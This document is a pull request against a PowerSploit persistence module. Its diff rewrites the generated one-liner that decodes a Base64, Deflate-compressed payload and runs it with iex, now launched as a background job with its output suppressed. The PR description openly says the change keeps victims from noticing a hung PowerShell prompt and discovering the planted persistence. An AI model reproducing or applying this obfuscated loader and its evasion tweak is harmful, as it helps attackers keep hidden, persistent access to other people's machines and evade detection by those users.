### PR TITLE
Fix for target not being able to launch powershell after adding persistence

### DIFF
--- a/Persistence/Persistence.psm1
+++ b/Persistence/Persistence.psm1
@@ -559,7 +559,8 @@ http://www.exploit-monday.com
 
     # Generate the code that will decompress and execute the payload.
     # This code is intentionally ugly to save space.
-    $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
+	$NewScript = 'start-job -scriptblock {sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()} | Out-Null'
+
 
 #endregion
 


### PR DESCRIPTION
When Powersploit's registry or schtasks persistence mechanisms are deployed, the user on the target machine will not be able to run powershell. This is because the payload (which is run inside a script in the user's profile) never returns, so the prompt will hang forever. This can be a problem since it might cause the target to become suspicious and investigate why he can't run powershell, finding the persistence mechanism. 

I fixed this by running the payload as a job and sending output to out-null. This way when a persistence mechanism is deployed on a target machine, the user can still run powershell without it hanging and without seeing payload output. 